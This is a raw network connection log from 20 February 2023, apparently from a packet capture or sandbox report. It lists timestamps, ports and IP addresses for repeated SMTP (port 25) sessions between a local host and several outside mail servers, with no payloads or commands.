Feb 20, 2023 09:50:47.283833981 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.283870935 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.284054995 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.284163952 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.285707951 CET	49703	25	192.168.2.5	85.187.148.2
Feb 20, 2023 09:50:47.286887884 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:47.287312031 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:47.306554079 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.306838036 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.309669971 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.309943914 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.312860012 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.312959909 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.313164949 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.313360929 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.336137056 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.336323977 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.340286970 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.340523958 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.341320038 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.341538906 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.342008114 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.342235088 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.351505041 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:47.351937056 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:47.366383076 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.366606951 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.369920015 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.370047092 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.370132923 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.370266914 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.370719910 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.370882988 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.395371914 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.395680904 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.398438931 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.398715019 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.398721933 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.398956060 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.399198055 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.399466991 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.416055918 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:47.416496992 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:47.424345970 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.424597025 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.427016973 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.427248001 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.427304983 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.427539110 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.427910089 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.428128004 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.451174021 CET	25	49703	85.187.148.2	192.168.2.5
Feb 20, 2023 09:50:47.453210115 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.453409910 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.455384016 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.455439091 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.455492973 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.455565929 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.455787897 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.455802917 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.479620934 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:47.480029106 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:47.480312109 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.480511904 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.482093096 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.482321978 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.482328892 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.482410908 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.482518911 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.482620001 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.507302046 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.507574081 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.508867979 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.509001970 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.509114981 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.509160042 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.509342909 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.509562016 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.534447908 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.534773111 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.535578012 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.535841942 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.535993099 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.536137104 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.536248922 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.536449909 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.542473078 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:47.542984962 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:47.562371016 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.562407970 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.562580109 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.562763929 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.562859058 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.562949896 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.563066959 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.563252926 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.589896917 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.590070009 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.590073109 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.590209007 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.590528011 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.590569973 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.590727091 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.590801001 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.605447054 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:47.605858088 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:47.617266893 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.617444038 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.617917061 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.617945910 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.618010998 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.618103981 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.618360043 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.618360043 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.645930052 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.646190882 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.646459103 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.646596909 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.647156954 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.647205114 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.647320032 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.647485018 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.668905020 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:47.669533014 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:47.672879934 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.673235893 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.673255920 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.673515081 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.675503016 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.675554037 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.675753117 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.675976038 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.699954033 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.700140953 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.700167894 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.700375080 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.703417063 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.703613043 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.704102993 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.704274893 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.726779938 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.726963997 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.727022886 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.727205038 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.730396986 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.730602980 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.731040955 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.731282949 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.732376099 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:47.732810020 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:47.753566027 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.753748894 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.753861904 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.754060030 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.757375956 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.757669926 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.758120060 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.758354902 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.781554937 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.781605005 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.781774044 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.781893015 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.785092115 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.785296917 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.786351919 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.786556005 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.794852972 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:47.795270920 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:47.808361053 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.808401108 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.808554888 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.808644056 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.811989069 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.812176943 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.813340902 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.813502073 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.835112095 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.835150957 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.835357904 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.835527897 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.838891983 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.839087009 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.840298891 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.840512037 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.857532978 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:47.857897997 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:47.861840010 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.862019062 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.862114906 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.862304926 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.865730047 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.865968943 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.867230892 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.867499113 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.888638020 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.888863087 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.888884068 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.889085054 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.892575979 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.892792940 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.894228935 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.894407988 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.915431976 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.915581942 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.915678024 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.915827036 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.919729948 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.919919014 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.920629025 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:47.921009064 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:47.921118021 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.921278000 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.942329884 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.942359924 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.942583084 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.942768097 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.946537971 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.946796894 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.948021889 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.948220968 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.969130993 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.969290018 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.969362974 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.969645977 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.973503113 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.973732948 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:47.975023031 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.979017973 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.979046106 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:47.979157925 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:47.983186960 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:47.983622074 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:47.995929956 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:47.996113062 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:47.996222019 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:47.996469975 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.000380993 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.000576973 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.022754908 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.022984028 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.023032904 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.023180962 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.027252913 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.027494907 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.045777082 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:48.046180010 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:48.049570084 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.049674988 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.049854040 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.050046921 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.053451061 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:48.053661108 CET	49706	25	192.168.2.5	142.250.27.26
Feb 20, 2023 09:50:48.054109097 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.054354906 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.076436996 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.076620102 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.076766968 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.076994896 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.080348015 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:48.080383062 CET	25	49706	142.250.27.26	192.168.2.5
Feb 20, 2023 09:50:48.080970049 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.081204891 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.103360891 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.103522062 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.103643894 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.103859901 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.108046055 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.108299017 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.108306885 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:48.108706951 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:48.130163908 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.130321026 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.130431890 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.130592108 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.134922981 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.135183096 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.156960011 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.157053947 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.157232046 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.157417059 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.161789894 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.162003994 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.170804024 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:48.171302080 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:48.183846951 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.183895111 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.184175014 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.184384108 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.188688040 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.188944101 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.210825920 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.210944891 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.211108923 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.211263895 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.215739012 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.216041088 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.234128952 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:48.234941959 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:48.237718105 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.237852097 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.237984896 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.238280058 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.242815971 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.243009090 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.264564037 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.264811039 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.264858007 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.265101910 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.269696951 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.269956112 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.291385889 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.291652918 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.291697025 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.291867018 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.296714067 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.296986103 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.297646046 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:48.298111916 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:48.318283081 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.318432093 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.318495035 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.318599939 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.323662996 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.323843956 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.345207930 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.345302105 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.345416069 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.345552921 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.350599051 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.350780964 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.360414982 CET	25	49713	94.100.180.31	192.168.2.5
Feb 20, 2023 09:50:48.360863924 CET	49713	25	192.168.2.5	94.100.180.31
Feb 20, 2023 09:50:48.372076035 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.372144938 CET	25	49710	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.372267962 CET	49709	25	192.168.2.5	142.250.102.26
Feb 20, 2023 09:50:48.372394085 CET	49710	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.377649069 CET	25	49712	142.250.27.27	192.168.2.5
Feb 20, 2023 09:50:48.377892971 CET	49712	25	192.168.2.5	142.250.27.27
Feb 20, 2023 09:50:48.399003029 CET	25	49709	142.250.102.26	192.168.2.5
Feb 20, 2023 09:50:48.399071932 CET	25	49710	142.250.27.27	192.168.2.5
